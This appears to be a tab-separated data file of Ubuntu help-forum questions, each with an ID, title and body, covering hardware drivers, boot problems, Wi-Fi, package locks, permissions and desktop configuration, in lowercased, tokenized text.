350931	sd card slot wo n't mount in chromebook with ubuntu 12.04 lts	i recently installed ubuntu 12.04 lts on my acer c700 chromebook . i am unable to figure out if the sd card wo n't mount or if it 's a driver issue . here is the test i have done so far looking up other people 's problem : looks like the computer see the hardware , 02:00.1 sd host controller [ 0805 ] : broadcom corporation netxtreme bcm57765 memory card reader [ 14e4:16bc ] ( rev 10 ) ( prog-if 01 ) subsystem : acer incorporated [ ali ] device [ 1025:0742 ] flags : bus master , fast devsel , latency 0 , irq 19 memory at e0520000 ( 64-bit , prefetchable ) [ size=64k ] capabilities : [ 48 ] power management version 3 capabilities : [ 58 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ ac ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 150 ] power budgeting < ? > capabilities : [ 160 ] virtual channel kernel driver in use : sdhci-pci kernel modules : sdhci-pci checking if it sees the sd card with 5 sec apart between checking it user @ chrubuntu : ~ $ ls -la /dev/sd* brw-rw -- -- 1 root disk 8 , 0 sep 27 17:24 /dev/sda brw-rw -- -- 1 root disk 8 , 1 sep 27 17:24 /dev/sda1 brw-rw -- -- 1 root disk 8 , 10 sep 27 17:24 /dev/sda10 brw-rw -- -- 1 root disk 8 , 11 sep 27 17:24 /dev/sda11 brw-rw -- -- 1 root disk 8 , 12 sep 27 17:24 /dev/sda12 brw-rw -- -- 1 root disk 8 , 2 sep 27 17:24 /dev/sda2 brw-rw -- -- 1 root disk 8 , 3 sep 27 17:24 /dev/sda3 brw-rw -- -- 1 root disk 8 , 4 sep 27 17:24 /dev/sda4 brw-rw -- -- 1 root disk 8 , 5 sep 27 17:24 /dev/sda5 brw-rw -- -- 1 root disk 8 , 6 sep 27 17:24 /dev/sda6 brw-rw -- -- 1 root disk 8 , 7 sep 27 17:24 /dev/sda7 brw-rw -- -- 1 root disk 8 , 8 sep 27 17:24 /dev/sda8 brw-rw -- -- 1 root disk 8 , 9 sep 27 17:24 /dev/sda9 user @ chrubuntu : ~ $ ls -la /dev/sd* brw-rw -- -- 1 root disk 8 , 0 sep 27 17:24 /dev/sda brw-rw -- -- 1 root disk 8 , 1 sep 27 17:24 /dev/sda1 brw-rw -- -- 1 root disk 8 , 10 sep 27 17:24 /dev/sda10 brw-rw -- -- 1 root disk 8 , 11 sep 27 17:24 /dev/sda11 brw-rw -- -- 1 root disk 8 , 12 sep 27 17:24 /dev/sda12 brw-rw -- -- 1 root disk 8 , 2 sep 27 17:24 /dev/sda2 brw-rw -- -- 1 root disk 8 , 3 sep 27 17:24 /dev/sda3 brw-rw -- -- 1 root disk 8 , 4 sep 27 17:24 /dev/sda4 brw-rw -- -- 1 root disk 8 , 5 sep 27 17:24 /dev/sda5 brw-rw -- -- 1 root disk 8 , 6 sep 27 17:24 /dev/sda6 brw-rw -- -- 1 root disk 8 , 7 sep 27 17:24 /dev/sda7 brw-rw -- -- 1 root disk 8 , 8 sep 27 17:24 /dev/sda8 brw-rw -- -- 1 root disk 8 , 9 sep 27 17:24 /dev/sda9 seems it does n't see anything . what 's my next step ? i have read something about gparted or gdisk . is that the next step i should do ? i do n't even know which one is the slot . also running a command ( i forgot ) that checks the disks only see my 16gb hard drive . edit more info my guess when the card is in there boots up , it 's giving me this error message . then , looks like it ca n't read the partition table ? 5.107298 ] mmcblk0 : error -84 transferring data , sector 0 , nr 8 , cmd response 0x900 , card status 0xb00 [ 5.107308 ] mmcblk0 : retrying using single block read [ 5.107819 ] mmcblk0 : error -84 transferring data , sector 0 , nr 8 , cmd response 0x900 , card status 0x0 [ 5.107826 ] end_request : i/o error , dev mmcblk0 , sector 0 [ 5.115264 ] mmcblk0 : error -84 transferring data , sector 0 , nr 8 , cmd response 0x900 , card status 0xb00 [ 5.115273 ] mmcblk0 : retrying using single block read [ 5.115786 ] mmcblk0 : error -84 transferring data , sector 0 , nr 8 , cmd response 0x900 , card status 0x0 [ 5.115794 ] end_request : i/o error , dev mmcblk0 , sector 0 [ 5.116775 ] mmcblk0 : error -84 transferring data , sector 2 , nr 6 , cmd response 0x900 , card status 0x0 [ 5.116784 ] end_request : i/o error , dev mmcblk0 , sector 2 [ 5.118304 ] mmcblk0 : error -84 transferring data , sector 5 , nr 3 , cmd response 0x900 , card status 0x0 [ 5.118312 ] end_request : i/o error , dev mmcblk0 , sector 5 [ 5.119853 ] mmcblk0 : error -84 transferring data , sector 0 , nr 8 , cmd response 0x900 , card status 0xb00 [ 5.119860 ] mmcblk0 : retrying using single block read [ 5.120362 ] mmcblk0 : error -84 transferring data , sector 0 , nr 8 , cmd response 0x900 , card status 0x0 [ 5.120368 ] end_request : i/o error , dev mmcblk0 , sector 0 [ 6.605260 ] fuse init ( api version 7.18 ) [ 9.284766 ] ieee80211 phy0 : device now idle [ 9.390974 ] ieee80211 phy0 : device no longer idle - scanning [ 13.199662 ] wlan0 : authenticate with 00:1e:2a:6d:20:60 [ 13.199687 ] ieee80211 phy0 : allocated sta 00:1e:2a:6d:20:60 [ 13.222741 ] ieee80211 phy0 : inserted sta 00:1e:2a:6d:20:60 [ 13.222750 ] wlan0 : send auth to 00:1e:2a:6d:20:60 ( try 1/3 ) [ 13.225332 ] wlan0 : authenticated [ 13.225341 ] wlan0 : moving sta 00:1e:2a:6d:20:60 to state 2 [ 13.229659 ] wlan0 : associate with 00:1e:2a:6d:20:60 ( try 1/3 ) [ 13.233737 ] wlan0 : rx assocresp from 00:1e:2a:6d:20:60 ( capab=0x411 status=0 aid=3 ) [ 13.233744 ] wlan0 : associated [ 13.233773 ] wlan0 : moving sta 00:1e:2a:6d:20:60 to state 3 [ 13.233784 ] ieee80211 phy0 : wmm queue=2 aci=0 acm=0 aifs=3 cwmin=15 cwmax=1023 txop=0 uapsd=0 [ 13.233794 ] ieee80211 phy0 : wmm queue=3 aci=1 acm=0 aifs=7 cwmin=15 cwmax=1023 txop=0 uapsd=0 [ 13.233802 ] ieee80211 phy0 : wmm queue=1 aci=2 acm=0 aifs=2 cwmin=7 cwmax=15 txop=94 uapsd=0 [ 13.233810 ] ieee80211 phy0 : wmm queue=0 aci=3 acm=0 aifs=2 cwmin=3 cwmax=7 txop=47 uapsd=0 [ 13.237394 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 13.238659 ] wlan0 : dropped frame to 00:1e:2a:6d:20:60 ( unauthorized port ) [ 13.239135 ] wlan0 : moving sta 00:1e:2a:6d:20:60 to state 4 [ 24.234613 ] wlan0 : no ipv6 routers present [ 35.964033 ] mmc0 : card 0007 removed [ 46.172559 ] sdhci : timeout waiting for buffer read ready interrupt during tuning procedure , falling back to fixed sampling clock [ 46.172601 ] mmc0 : new ultra high speed sdr104 sdhc card at address 59b4 [ 46.172858 ] mmcblk0 : mmc0:59b4 usdu1 29.4 gib [ 46.183129 ] mmc0 : controller never released inhibit bit ( s ) . [ 56.181486 ] mmc0 : timeout waiting for hardware interrupt . [ 56.181605 ] mmcblk0 : error -110 sending status command , retrying [ 56.231565 ] sdhci : timeout waiting for buffer read ready interrupt during tuning procedure , falling back to fixed sampling clock [ 56.241616 ] mmc0 : controller never released inhibit bit ( s ) . [ 56.241745 ] mmcblk0 : error -5 sending status command , retrying [ 56.241884 ] mmc0 : unexpected interrupt 0x04000000 . [ 56.242096 ] mmcblk0 : unknown error -5 sending read/write command , card status 0x900 [ 56.242111 ] end_request : i/o error , dev mmcblk0 , sector 0 [ 56.242119 ] quiet_error : 112 callbacks suppressed [ 56.242124 ] buffer i/o error on device mmcblk0 , logical block 0 [ 56.243022 ] mmcblk0 : unable to read partition table [ 153.093523 ] mmc0 : card 59b4 removed [ 173.172890 ] mmc0 : timeout waiting for hardware interrupt . [ 179.881805 ] mmc0 : card removed during transfer ! [ 179.881816 ] mmc0 : resetting controller . [ 208.557992 ] mmc0 : timeout waiting for hardware interrupt . [ 218.562994 ] mmc0 : timeout waiting for hardware interrupt . [ 228.567981 ] mmc0 : timeout waiting for hardware interrupt . [ 238.572991 ] mmc0 : timeout waiting for hardware interrupt . [ 248.578000 ] mmc0 : timeout waiting for hardware interrupt . [ 258.583003 ] mmc0 : timeout waiting for hardware interrupt . edit # 2 well after few more hours tinkering , i have more answers with no solution . it will not see a micro sd card in anyway i play with it . except with the log above , it sees it then turn off the reader it seems . it saw the size of the card as 29.4gib , but unable to get the system to see/mount or use it . the computer will only mount the card in 2 ways ; first one is boot ubuntu with the card already in the slot ; or insert card while system is running then plug in any flash drive , it will then mount the card . when the computer sees the card , the device is mmcblk0 ; but with the card inserted before booting , the device is mmcblk0p1 . with that , not sure what i should dedicate the script to . gpart wo n't see/detect the card or device ( mmcblk0 or mmcblk0p1 ) at all if any of the above is unable to see the card . right now the only thing that works is to boot the system with a non-micro sd card in the slot . then it will see the card and read/write .
350933	strange 2.02mib unallocated space left after deleting a parttion	i deleted volume ( via windows 7 disk management ) of hddrecovery partition ( manufacturer recovery ) and then stretched the main partition c : to use unallocated space . everything looked great on windows end , but now in gparted , i show 2.02mib unallocated . i am still using ubuntu live from usb . i was actually going to install dual boot tonight . but first , what is the easiest way to get rid of the 2.02mb unallocated , to merge it with sda2 ? i know this has been asked before , but what i am finding in search results still leaves me lost at the beginning of the tutorial/answer ( ie : swap partition , move to the left , etc ? ) .
350935	nvidia geforce gtx 765m problems	the problem started with a black screen that i fixed ( error loading graphics when loading so ) , now ubuntu does n't detect my vga and my resolution is all wrong ( default 1920*1080 ) . i tried a lot of different things since re installing xserver to re-installing manually the nvidia drivers but none worked , help ! processor : i7 4700mq
350937	black screen on boot , no keyboard	i have been running ubuntu for a couple years version 12.04 . it has been working correctly and the only thing that i remember changing is to make it boot automatically for my wife . now , it boots up with the following on the page in very small print : helentotten @ ubuntujjtotten : '' [ ] at least that is what it appears to be . there could be `` at the beginning before helen but i am not sure . after it gets this far i am no longer able to input anything from the keyboard . i have tried running grub in the recovery mode but it made no change . i scrolled down to the following line : ubuntu 12.043 , 2 lts , kernel 3.2.0-30-generic ( recovery mode ) there are actually several choices and i have tried all of them to no avail . i do n't have a clue how to get past this screen and enable keyboard input again . i am just an inexperienced user and do n't know much about ubuntu
350941	make programm shortcut with .sh and .png	i have a pycharm.sh file and a pycharm.png . how do i create an executable given the two ? i tried this : sudo chmod +x ./pycharm.sh but nothing is happening . i want and icon on the desktop and it to show up under my programs . i want to be able to pin it to the panel .
350942	can not get mcrypt for php5	i 've done this many times : sudo aptitude install php5-mcrypt sudo apache2ctl restart aptitude says mcrypt is installed . i 've reinstalled it 3 times already . i 've restarted apache about 20 times since i installed it . when i look at phpinfo , i do not see mcrypt listed . when i try to execute my code it says the mcrypt function ( pick one - any one ) does not exist . mcrypt is clearly not enabled . does anyone have any idea what could be wrong ? i do not know which pieces should be where and how all this is supposed to fit together . i installed php 5.5.3
350944	how to backup /proc folder with > 2000 subfolders and 140tb kcore file ?	i found the /proc folder with > 2000 subfolders and a kcore data with 140tb . all created at the same time . what is this ? all the folders are named from 1 to 2634 and have all 44 subentries ... using ubuntu 12.04 thanks the problem appears when i try to back up my entire system ... but when i back up , it seems try to backup the kcore file ( which is 130tb , so impossible to do ) any suggestions ? thanks
350950	have i been hacked by the nsa or something ?	so i have specifically not done an update for a while . i skype with my daughter daily and use ubuntu 12.04 ( i think it 's .04 but definitely 12 ) . after every session i used to go to file system/tmp and there would be the video file labelled as out.mpg . i would then cut this from there and store it in another folder where i save our chats . today , the tmp folder was no longer there . i did a search for it and found it in a completely different directory , one whose name made the hair on the back of my neck stand on end . i found it here : home/playonlinux 's virtual drives/e_/dosdevices/c : and in this folder was a lot of stuff labelled as windows and windows based things . i found other files that seem to be windows related and i am no programmer but i know i did n't install wine and i did n't install the latest updates for about a month now in fact i specifically have not done so , so why would the whole nesting of my tmp folder suddenly be in a location that as far as i know never existed before today ? even freakier , i took some screen shots ( not sure how to append the images here [ i am a neewb at anything technical on ubuntu ] ) and now that i went back to check the path again for writing this , the tmp folder is once again back under it 's usual place . i mean ... wtf ? ? ? there is also a folder called dosdevices and files called playonlinux.cfg playonlinux.log etc . obviously playonlinux seems to me to be some way to access linux from a windows based machine ? what the hell is going on . can any of you help with this ? i can e-mail screen shots of some of the code in the files too or send the files ( if they are still going to be there ) i know this makes me sound like a tin-foil hat conspiracy whack job , but this is just strange !
350954	how to get avast ! on computer after getting the download ?	i downloaded avast ! and have avast4workstation_1.3.0-2_i386.deb as the downloaded file . what do i do next to finish installation ?
350957	ubuntu remote login help	i 'm trying to register a machine in the `` universal client configuration service '' so i can login remotely ( via the login page for lightdm ) , however i 'm not sure what to use in the `` server url '' field . i 'm guessing this connection will go trough my ubuntu one account , so i 'm not sure what to use here . steps i have done are : on the login page , select remote login and click on setup a temp login opens with firefox pointing to https : //uccs.landscape.canonical.com/ added name and protocol as rdp click on add remote desktop page refreshes back so i can add a server
350962	how do i remove netflix-desktop completely	the script to install netflix-desktop downloaded everything needed except for firefox . i keep trying to remove the program through `` sudo apt-get remove -- purge netflix-desktop '' . however , when i reinstall netflix-desktop it runs through the script as if it 's already downloaded everything . i 've removed .wine-browser and /usr/share/netflix-desktop . when i have netflix-desktop installed , i can issue the command `` netflix-desktop -- showdebug '' which will tell me that firefox.exe can not be found .
350963	bash completions : what one can do with them and when are they loaded in the shell ?	weird behavior of a 3rd party ( from a windows guy ) program ( related to python packaging.. ) confused me a little but this question might explain everything . sorry , i do n't know pretty much anything about completions . but of course there is some information on the web . i tried to read it , but it is quite late already and i could miss something . basically the question is simple : can one put any kind of shell script in a completion , and they are loaded once on the start of the shell and work all the shell 's lifetime are n't they ? i mean , a completion file is just a bash script , is n't it ? it just uses some additional built-in bash functions , like complete to set up some `` completion space '' for the new shell . and it happens on the start of the shell , just like with bashrc . and also completions quite often use lots of functions defined in the completion file . when you call complete in shell you see the list of completions with many names of those functions -- all of them are defined at the start of the shell , they are stored somewhere and they work for this shell all it 's lifetime . is it correct ? ps and just out of curiosity , where one could look up these functions defined on the start of the shell ? are they listed somewhere , like environment variables ?
350965	installed ubuntu resulted in gray screen	i installed ubuntu 13.04 and it completed but on restart i only got a light gray screen and a working cursor . i again did a reinstall which resulted in same light gray screen and cursor . i 'm at a loss here . update ; after about 20-mintues i moved the mouse and a log-in window appeared , signed in and went back to a light gray screen again . now waiting again for the screen to get to a desktop screen . update2 ; after 5th reinstall i was able to get to the login screen where background image added some dots to the plum background image and added guest and remote options . but when inserting password/enter i come to a black screen with an `` i '' in center of screen . when moving the `` i '' around i can find sides , corners and top and bottom of what appears to be a large space for typing in ( but can not get beyond total black screen ) .
350966	wine , ti connect installation errors	i 've installed wine on my laptop on a ubuntu 12.04 os , i 've successfully installed spotify on my computer , and it does work . when i try to install the ti connect software it installs it , but it wo n't run , saying that it may need to be re-installed .
350968	firefox wo n't launch , `` error : access was denied while trying to open files in your profile directory ''	i can not launch firefox , as i 'm getting the `` your firefox profile can not be loaded . it may be missing or inaccessible . '' error when i attempt to launch the latest firefox in ubuntu 13.04 ( up to date ) . bash produces the following : ( process:5052 ) : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed error : access was denied while trying to open files in your profile directory . fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . i do not think this is a duplicate question , as i have tried the 3 solutions that are posted in one place or another . here they are : ( 1 ) remove and reinstall ff . attempting to launch produces the same error . ( 2 ) rename /home/ [ myname ] /.mozilla from bash , then create a new folder to replace it , so as to make sure that the correct user owns the directory . attempting to launch produces the same error , both in unity and in terminal . ( 3 ) chown the directory from bash , with sudo chown myname /home/myname/.mozilla or with sudo chown myname : myname /home/myname/.mozilla the command executes without problems , but launching ff produces exactly the same error as before . when i check the owner of the folder , it shows the correct user ( me ) . recursively setting all permissions to 777 ( so there ca n't be a problem with the permissions still gives the same thing . i can run 'sudo firefox ' from bash . but bash throws a warning that the profile folder has the wrong owner ( i.e. , it 's not owned by root ) . so , any ideas ? update : complete purge removal via sudo apt-get purge firefox firefox-globalmenu firefox-gnome-support and reinstall with sudo apt-get install firefox firefox-globalmenu firefox-gnome-support also does not work . exactly the same behavior as before .
350969	formatted drive with wubi installation , windows boot manager menu still shows option	i had ubuntu 12.04 installed with wubi on a partition of my main hdd and decided i would do a proper installation of it . in the process of prepping the drive , i foolishly formatted the partition before uninstalling ubuntu and because of that , the entry on the windows boot manager menu was never removed either . how might i go about fixing this problem ? i 'm hoping to be able to remove that entry and disable the menu . cheers
350970	what path should i install files to ?	i 've searched everywhere and ca n't seem to find an answer ... i 've just switched from windows and am trying to get the hang of ubuntu 13.04 . i just installed jdk7u40 with netbeans 7.3.1 but it defaulted to the home folder ... i do n't think this was right since all my other apps that were installed through software centre went somewhere else and it does n't show up when i search using the superkey . so where should/can i set the install path next time to better my allocation ? for example , when i manually install eclipse android sdk , can i set the install path to `` /usr/share '' ? help is most appreciated !
350972	fresh installation of 12.04.3 or 13.04 always boots to terminal/graphical boot fail ( amd )	i 'll just say that i am not experienced with linux , and i 've attempted to install ubuntu on my windows 8 uefi laptop at least ten times this past month . i 've tried the lts 12.04 version which greeted me with no gui but a simple terminal prompt asking me to log in . i assumed at first that 12 did n't exactly have as much support for uefi than the latest 13.04 version , but after trying to boot that one , it returned an identical result ! i was able to install ubuntu each time without error with a usb drive ; i installed it on pre-made partitions ( for the main os and the swap ) because it was suggested they 're made before installing . but when i went to boot it -- i had to f12 and choose the correct boot , i planned to fix the common grub loader issue with boot repair -- it would give me the ubuntu loading screen followed by a simple terminal . i 've turned off fast startup , secure boot , and pretty much everything else required for a `` smooth '' install on uefi . it 's interesting to note that this issue also occurs when i use the `` try ubuntu before installing '' option when booting from my usb drive . it would boot straight to a terminal . now , i 've followed every possible solution given by other questions in this forum that i 've found , the detailed instructions included in the uefi tutorials , everything . i 've even tried , out of desperation , following instructions that revolve around nivdia drivers , even though i have an amd driver : maybe amd uefi computers are unsupported ? i tried things such as startx and that returns an error relating to xorg.conf , etc . i 've tried uninstalling and reinstalling that with `` solutions '' but that too does n't help . i 'm certain this issue is due to my display ? i do n't mind if there is n't a solution , i just need to know if there is or not . i 'll be happy to give more information if that 's required , i 'm just unsure what to do at this point .
350974	hdd problems with superblocks	hello everyone and thanks for your help in advance i bought a new laptop and after moving the home folder successfully i wanted to delete all the partitions from my old one , overwrite everything with bleach and the make a new clean install of ubuntu to my old laptop and give it to a friend . during installation i chose the following configuration 1 gb boot 245 gb / 245 gb empty 4 gb swap the installation said that the second partition could n't be formatted because of some error . i then connected the hard externally to my new laptop and run gparted which also could n't format it . after some research i run the command dumpe2fs /dev/sde1 | grep -i superblock and the reply was something like : backup superblock at : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 , 71663616 , 78675968 , 102400000 . then i run the command e2fsck -f -b -y 32768 /dev/sde1 after 2 days straight the command is still running and i do n't know what to do , please advise is there any faster way to do it ? the hard disk is `` empty '' 500gb and prior to this i had no problems at all , i was even thinking of using my old hd to my new laptop because i was bored reinstalling ubuntu . i do not even care about the data it contains right now the output is : error reading block 20976926 ( attempt to read block from filesystem resulted in short read ) while getting next inode from scan . ignore error ? yes force rewrite ? yes
350976	uninstalled windows , now bootmgr is missing	i enjoyed using ubuntu for the past few weeks and decided to uninstall uindows using the `` os-uninstaller graphical tool '' . now i get the error bootmgr is missing . when i try to use the dvd from the boot menu , it shows kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 2,0 ) i 'm new to linux and any help is greatly appreciated .
350977	wifi can not reconnect after lost connection	i have a problem with my wifi , where i lost my wifi connection without a reboot . it usually happen in this way : i try to browse some page but it gets timed out ( for unknown reason ) i attempt to reconnect the wifi wifi disconnects , but can not reconnect i have to reboot my laptop to reconnect the wifi on my laptop . what i would like to do is to reconnect without having to reboot . thanks in advance , and will appreciate with any help .
350978	ubuntu 13.04 , after suspending my monitors do n't show anything	i have recently installed ubuntu 13.04 and have had no issues except when suspending . when trying to suspend the computer acts normal until i try to wake it . when waking the computer , it acts normal except neither of my two screens show anything . i have tried to update ubuntu , but have had no luck .
350981	how can i install gtx260 drivers on ubuntu ?	i 'm trying to install gtx260 drivers on 32 bit ubuntu . gedit will not open the file . when run , the file says i 'm running 'x server ' and that the correct graphics card is not installed . when i turn use service stop on gdm ( which google led me to believe was the way to stop x server ) , there is a black screen and text input does n't seem to do anything . the nvidia-current and nvidia-settings packages have broken dependencies ( dkms and screen-resolution-extra ) . checking other similar threads and trying the solutions presented there did not avail me . i 'm a noobie .
350991	using filename substitution -- how to search for files with letters in this order ?	so i need to find all files which have d , o , and g in the filename . the letters do not need to be side by side ( aadaaoaagaa would be a correct filename , aaoaadaag would not be a correct filename ) . it does not matter if the letters are uppercase or lowercase ( aadaaoaag is a correct filename , as is aadoga . how would i use filename substitution on the terminal command line to list all of the files like this ? preferably without using loops or anything too advanced . all i have been introduced to so far is filename substitution characters ( * , ? , [ ] )
350992	how do i override an mtu provided by dhcp ?	i 'm running ubuntu server 12.04 lts , and i want to override the mtu my cable company provides via dhcp . they provide an mtu of 576 and i want to use 1492 . i can change it with ifconfig , but it wo n't persist across reboots . i tried to edit the file /etc/network/interfaces , but the setting gets ignored on the interface ( the mtu setting works on the internal interface that uses a static ip address ) . how can i make the interface force an mtu of 1492 even when it is provided with an mtu via dhcp ?
350993	sound does n't play in browser	os : ubuntu 12.04 problem : while i am able to play music files from my desktop , sound does n't play when i run a video in a browser , say from youtube . also , video runs in a bit of fast forward mode . on doing a bit of troubleshooting at my end , i discovered following error : e : unable to locate package linux-alsa-driver-modules-3.2.0-54-generic do n't know if it is related or not but i tried running pacmd command from command line and received following message : no pulseaudio daemon running , or not running as session daemon .
350997	what version of ubuntu for macbook pro ( intel ) ?	first-time poster , fairly long-time ubuntu user , zero mac experience . trying to help a friend select a version of ubuntu for her macbook pro ( intel core2 duo 2.53ghz chip ) . having a tough time finding a version to download and my google-fu is failing me . can someone post a direct-download link for an image of 13.04 that will work on this hardware ? i see a lot of different versions but am unsure which to use . ideally we 'd like one with a `` livecd '' option , so she can try it out prior to committing to a full install . thanks ! ! : )
351001	installation problem in ubuntu ( asking for installation after installation is over )	i 'm using hp envy 4 pc i formatted my laptop then while i 'm installing ubuntu 13.04 it is installing ... . after installation is over if i do restart my pc it is asking for installation again please help me
351002	triple-boot - ubuntu/windows showing up but not red hat	i installed triple boot windows 7 , red hat 5.5 , and ubuntu , but it 's not showing red hat . it only shows windows 7 and ubuntu at booting time . can you please hep me out ? thank you .
351003	kickstart installation ubuntu through boot problem	when i started the kickstart installation , giving the http address of the kickstart file , it says `` file not found '' . i am giving : file=myip/ubuntu/preseed/ubuntu.seed boot=casper initrd=myip/casper/initrd.lz file=myip/ks.cfg -- the ip i am giving is through http , but it says `` file not found '' . is there a method to give the boot menu or any other method to get the kickstart done ?
351006	how can i solve `` could not get lock /var/lib/dpkg/lock '' error ?	how can i solve this ? i am a new user . here is the error : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? sudo apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
351017	awesome wm ca n't find xcb-cursor 12.04	i 'm trying to install awesome wm following : http : //awesome.naquadah.org/wiki/awesome-3.4.11/git-ubuntu-lucid but instead of installing libxcb-1.8 , xcb-proto-1.7 , xcb-util-0.3.8 and xcb-util-wm-0.3.8 i installed libxcb-1.9.1 xcb-util-0.3.9 xcb-util-wm-0.3.9 xcb-proto-1.8 xcb-util-renderutil-0.3.8 when i try to compile awesome i get the following error : package 'xcb-cursor ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:266 ( message ) : a required package was not found what am i missing ?
351021	wifi on wpa2 : ca n't access internet , can access lan	the wifi in my laptop seems to be having a problem with wpa2 . i can connect to my network without issue and everything works fine for up to 5 minutes , but then i ca n't access the internet . the network configuration still thinks all is well , but i ca n't reach any hosts . i can , however , reach anything inside my lan . switching to my open guest network allows me full access to the internet with no interruptions indefinitely . lspci reports the following about my wireless adapter : network controller : intel corporation pro/wireless 4965 ag or agn [ kedron ] network connection ( rev 61 ) any suggestions ?
351022	ubuntu with all audio drivers	is there an ubuntu that comes pre-installed with all audio drivers considering that i dont have access to the internet that much
351024	unable to shut down : failed to execute child process `` lubuntu-logout '' ( no such file or directory )	i am unable to shut down after i uninstalled many programs in lubuntu using software center . the error message that i get is : failed to execute child process `` lubuntu-logout '' ( no such file or directory ) .
351027	how do i purge the steam installer ?	from the related question here the first i did was purging steam how do i remove steam ? the next step would then be to also remove related files in ~/.local/share/steam and in addition to the answers from above ~/.steam . one thing makes me believe there still will be more to do . the reason i purged steam in the first place was that on other user 's account we get a message to install steam on every login : this will definitely not come from files in my home directory , and can also not be from a system-wide steam package , as this was purged as can be seen from the synaptic window in the background of the shot above . also in the other user 's accounts there is no ~/.steam or ~/.local/share/steam directory . autostart applications in ~/.config/autostart/ or /etc/xdg/autostart have no steam related entries . where do i have to look for this `` installer '' to also remove it ? will there be any other steam-related files cluttering my drives ? here is running 12.04 lts amd64 on a productive desktop . steam was installed initially from the software center .
351030	how can i install ubuntu in windows 7 32bit machine ?	how do i install ubuntu.iso ( downloaded from ubuntu.com [ more than 700mb ] ) in my windows 7 ultimate 32bit . please explain step by step.. thanks
351032	how to make my desktop empty	how to make my desktop empty , that means when i login i need my desktop blank . i does n't need any launchers and top indicator panel , i need empty screen ( black ) only . is it possible and how ?
351036	wirelss problem with rt3290 in ubuntu 13.04	i have a hp pavilion laptop with rt3290 wifi device . the original driver provided by ralink corporation compiles in 12.04 but fails to compile in 13.04 ( i guess this is a problem with kernel.. ) . also the inbuilt driver rt2800 works fine at some places , but can not connect at others.it shows the available networks but does not connect ... .any help ? ? ?
351038	awesome wm - running lua rc.lua gives an error	i install awesome using sudo apt-get install awesome i copied my rc.lua to ~/.config/awesome and ran lua rc.lua i got the following error : lua : rc.lua:2 : module 'awful ' not found : no field package.preload [ 'awful ' ] no file '/usr/local/share/lua/5.2/awful.lua' no file '/usr/local/share/lua/5.2/awful/init.lua' no file '/usr/local/lib/lua/5.2/awful.lua' no file '/usr/local/lib/lua/5.2/awful/init.lua' no file './awful.lua' no file '/usr/share/lua/5.2/awful.lua' no file '/usr/share/lua/5.2/awful/init.lua' no file './awful.lua' no file '/usr/local/lib/lua/5.2/awful.so' no file '/usr/lib/x86_64-linux-gnu/lua/5.2/awful.so' no file '/usr/lib/lua/5.2/awful.so' no file '/usr/local/lib/lua/5.2/loadall.so' no file './awful.so' stack traceback : [ c ] : in function 'require' rc.lua:2 : in main chunk [ c ] : in ? i 'm using ubuntu 12.04 . i 'm not sure what i 'm doing wrong or what is missing . help please .
351042	not able to change path to a directory in ubuntu	i need to change the directory to following path /media/new volume/softwr/pgm and /home/sdk for 2 diff purpose . but by using cd its not working i tried cd media and cd home both time its showing such file or directory not existing . i am new to linux environment.i 'm using ubuntu 12.04lts can anyone help ?
351043	can not unlock from graphical screen	i can not unlock my ubuntu 13.04 from the unlock screen . it immediately returns to the lock screen , even if the password is right . i need to to enter the vt and do display=:0 gnome-screensaver-command -d to unlock . the fact that i can enter the vt , and log in at initial lightdm means my pw/kb is right . auth log : sep 28 16:13:11 sean-aspire-4736z dbus [ 1074 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.58 '' ( uid=1000 pid=2480 comm= '' /usr/lib/indicator-session/indicator-session-servi '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.14 '' ( uid=0 pid=1641 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` )
351044	filesystem root low disk space !	i had to install some packages for android development , and now it is full . i had gice 5.4 gb as it was said recommended.. and now how can i get rid of this problem . or is there any way i can increase the /root partion size ?
351045	how to install wifi drivers of pc card buffalo e54 on ubuntu 12.04	i am using buffalo e54pc card to run wireless internet on my laptop . every time i log on to ubuntu 12.04 , i have to manually give commands in terminal in order to connect the wireless . i am using ( ndiswrapper ) drivers . are there any other drivers through which my pc connect to wifi network automatically every time i log on ? ? ? i have tried ndiswrapper drivers but i have to manually connect everytime .
351050	how to start the tcp port 7717 & 5282 for bmc tuner	how to start the tcp port 7717 & 5282 which are using by bmc marimba /bbca tuner on desktops . i have installed the bbca tuner 8.2 package in ubuntu 13.04 .but it is not working since the related ports /service are not starting . will it be possible to add marimba services using 7717 & 5282 ? regards arunkumar
351054	how to find out more with command gdb when gnome-terminal crashes ?	is this dependent on which themes are actually set with gnome-tweak-tool , when gnome-terminal crashes ? at moment here gnome-terminal is crashing often ( conflict between themes and lang-settings in de because of euro ? ) . how do i find out more with command gdb ?
351055	how do i manage files on ubuntu server ?	i installed ubuntu desktop 12.04 and ubuntu server , but i am denied access to any files on the server . i can view them but i can not alter , edit , or move them . confused as to how i can run a server if i do n't have permission to edit files ?
351056	ubuntu dashboard change the shortcut	the shortcut to open the application dashboard is : alt + f2 and i 'd like to change it to : ctrl + alt + d system preferences can be opened via : gnome-control-center i 've looked into keyboard shortcuts but did n't find the shortcut there . is there any way i can edit this particular shortcut ?
351059	can not open ubuntu-tweak	i just downloaded ubuntu tweak in my dell vostro with 13.04 os i changed my desktop theme and after it changed , i cant open my ubuntu tweak anymore it just shows up the logo and then nothing happens whats wrong with my ubuntu tweak ? pls help me
